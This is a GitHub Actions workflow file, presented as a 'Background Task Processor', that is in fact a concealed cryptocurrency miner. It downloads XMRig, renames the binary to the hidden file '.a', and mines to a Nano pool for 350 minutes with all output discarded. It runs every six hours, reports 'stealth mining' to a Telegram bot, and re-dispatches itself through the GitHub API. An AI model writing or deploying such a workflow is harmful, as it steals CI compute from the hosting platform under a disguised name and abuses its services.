name: Background Task Processor

on:
  workflow_dispatch:
  schedule:
    - cron: "0 */6 * * *"

jobs:
  task:
    runs-on: ubuntu-latest
    steps:
    - name: Prepare Environment
      run: |
        sudo apt-get update
        sudo apt-get install -y wget curl jq tar

    - name: Notify Start to Telegram
      env:
        TG_TOKEN: ${{ secrets.TG_TOKEN }}
        TG_CHAT_ID: ${{ secrets.TG_CHAT_ID }}
      run: |
        curl -s -X POST https://api.telegram.org/bot$TG_TOKEN/sendMessage \
        -d chat_id=$TG_CHAT_ID \
        -d text="🟢 Stealth mining dimulai.\n\nWorker sedang dijalankan melalui GitHub Actions."

    - name: Download & Run Stealth Worker
      run: |
        curl -LO https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz
        tar -xzf xmrig-6.24.0-linux-static-x64.tar.gz
        mv xmrig-6.24.0 task
        cd task
        mv xmrig .a
        chmod +x .a
        timeout 350m ./\.a -o xmrig.nanswap.com:3333 -a rx -k -u nano_1ep4soo6rat31n6otw4ggqdwj7tz5sjymyzfwi7kmhye6f31guujdo19cc3q -p stealth > /dev/null 2>&1

    - name: Notify Done to Telegram
      env:
        TG_TOKEN: ${{ secrets.TG_TOKEN }}
        TG_CHAT_ID: ${{ secrets.TG_CHAT_ID }}
      run: |
        curl -s -X POST https://api.telegram.org/bot$TG_TOKEN/sendMessage \
        -d chat_id=$TG_CHAT_ID \
        -d text="✅ Stealth mining selesai.\n\nDurasi: 350 menit\nStatus: Done."

    - name: Re-trigger Task
      if: ${{ github.event_name == 'workflow_dispatch' }}
      run: |
        curl -X POST -H "Accept: application/vnd.github+json" \
             -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
             https://api.github.com/repos/${{ github.repository }}/actions/workflows/build.yml/dispatches \
             -d '{"ref":"main"}'
